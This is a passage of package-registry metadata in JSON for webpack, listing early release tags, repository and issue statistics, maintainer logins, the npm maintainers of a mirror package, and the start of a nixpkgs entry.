/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T03:20:17.565Z","dependent_packages_count":2,"downloads":32,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":34.04520642489647,"dependent_repos_count":25.32799796580169,"dependent_packages_count":9.4821380216761,"stargazers_count":0.083753509832893,"forks_count":0.5281295915459677,"average":13.893445102750624},"purl":"pkg:npm/%40ecapp/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@ecapp/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@ecapp/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@ecapp/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ecapp%2Fwebpack/codemeta","maintainers":[{"uuid":"theoton","login":"theoton","name":null,"email":"394347566@qq.com","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~theoton","role":null,"created_at":"2022-11-17T03:33:15.045Z","updated_at":"2022-11-17T03:33:15.045Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/theoton/packages"},{"uuid":"jason5014","login":"jason5014","name":null,"email":"1696732332@qq.com","url":null,"packages_count":32,"html_url":"https://www.npmjs.com/~jason5014","role":null,"created_at":"2022-11-17T03:33:15.037Z","updated_at":"2022-11-17T03:33:15.037Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jason5014/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13184465,"name":"nodePackages.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T23:50:06.248Z","latest_release_published_at":"2026-02-01T23:50:06.248Z","latest_release_number":"5.90.3","last_synced_at":"2026-08-23T06:30:25.617Z","created_at":"2026-02-01T23:49:56.895Z","updated_at":"2026-08-23T07:05:23.293Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=nodePackages.webpack","install_command":"nix-env -iA 